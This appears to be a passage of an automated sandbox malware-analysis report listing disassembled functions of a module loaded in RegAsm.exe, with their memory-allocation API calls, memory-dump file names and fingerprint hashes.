                                                                                                                                                                                                                                                                                                  • Instruction ID: 87ceca6558e44fcd4c64abbaa8ca881f7a360aced733a19dc5f34f35e2a043bf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 913352bdbd065b59e8add741f2f705e6c9375600bc5e7b76b1ffe34b918ebada
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD0A733280108E6C6316A908E0DF3D37759702329F10C430F31544A51D7B09450CFA0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C84B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C84B2C9,?,?,?,6C84B127,?,?,?,?,?,?,?,?,?,6C84AE52), ref: 6C84B628
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C8490FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C849108
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C84B2C9,?,?,?,6C84B127,?,?,?,?,?,?,?,?,?,6C84AE52), ref: 6C84B67D
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C84B2C9,?,?,?,6C84B127,?,?,?,?,?,?,?,?,?,6C84AE52), ref: 6C84B708
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C84B127,?,?,?,?,?,?,?,?), ref: 6C84B74D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 99920fe503abb6f6a2bda47e5caa03bbdeda4aba0d995207804f6c48a7ba31ca
                                                                                                                                                                                                                                                                                                  • Instruction ID: 509043c577dd1c1ef027b24938f864cfd9d9aa2ef42f9d7f001bcd450e7f4871
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99920fe503abb6f6a2bda47e5caa03bbdeda4aba0d995207804f6c48a7ba31ca
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3951C071A05A1A8FDB24CF58CA8476EB7B5FF46314F45C92DC85AAB700D731AC04CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C84DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C83FF2A), ref: 6C84DFFD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C8490FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C849108
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C83FF2A), ref: 6C84E04A
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C83FF2A), ref: 6C84E0C0
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C83FF2A), ref: 6C84E0FE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0abb666f613204373e2c6043fa1276430837d6d58d5a832ef0407d9cc2f5d765
                                                                                                                                                                                                                                                                                                  • Instruction ID: fa814365e61ace7c9fd435dddd65b35bb1fbd49196db3f436c71b790f86e5936
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0abb666f613204373e2c6043fa1276430837d6d58d5a832ef0407d9cc2f5d765
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB41917160421ACFEB34CF58DA8075AB7B6BB45309F148939D526DBB40E771E904CBD2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C846E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C846EAB
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C846EFA
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C846F1E
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C846F5C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4259248891-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d2ec01fbd2c48ebea189e093d2d43cd5e7d8bdecbb96d678e0b8b75f84aaf9c9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5ddf896d6d07894f9e85913596010be781890a96d94eefe8f5f9ca49084e14b6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2ec01fbd2c48ebea189e093d2d43cd5e7d8bdecbb96d678e0b8b75f84aaf9c9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C131C771A1060A8FDB24CF2CCA80AAE73E9EB85344F508539D45AD7651FB31E559C7A0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C85B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B5EA
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B623
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B66C
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B67F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: malloc$free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0299614b0e40c6d730d07288a264dea87203f340a74ac0b4f443ced39e28afdb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2271ad6c32e394e595b992c4e70683b1fd6175c9753e2bf7fa2c1fe68fcea287
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0299614b0e40c6d730d07288a264dea87203f340a74ac0b4f443ced39e28afdb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2310A719002158FDB60CF58C94466EB7F6FF80304F568929C8069B341EB71ED25CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C82F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C82F611
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C82F623
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C82F652
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C82F668
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                                  • Instruction ID: 94bc3fdb4faecc4cc1f8036c6a03a1a38c4a4daf4f98934563aeb81217c66512
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33316171A002249FCB24CF1DCEC4E9B77B5EB94354B148938FA498BB05D635E984CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8426B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ba778e653af1c8becde424cacfddbc5c49a9fa7455dcf6e1feb721686a184908
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f0b7f1a446a0bd9a82f3f14a3d4828d3ea5f0eb5229f268713d87b9af186d6b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba778e653af1c8becde424cacfddbc5c49a9fa7455dcf6e1feb721686a184908
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F0F9B2B052055BE7209A58D98895B73A9EF4125CB104835EA16C3B02F335FD18C7E1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%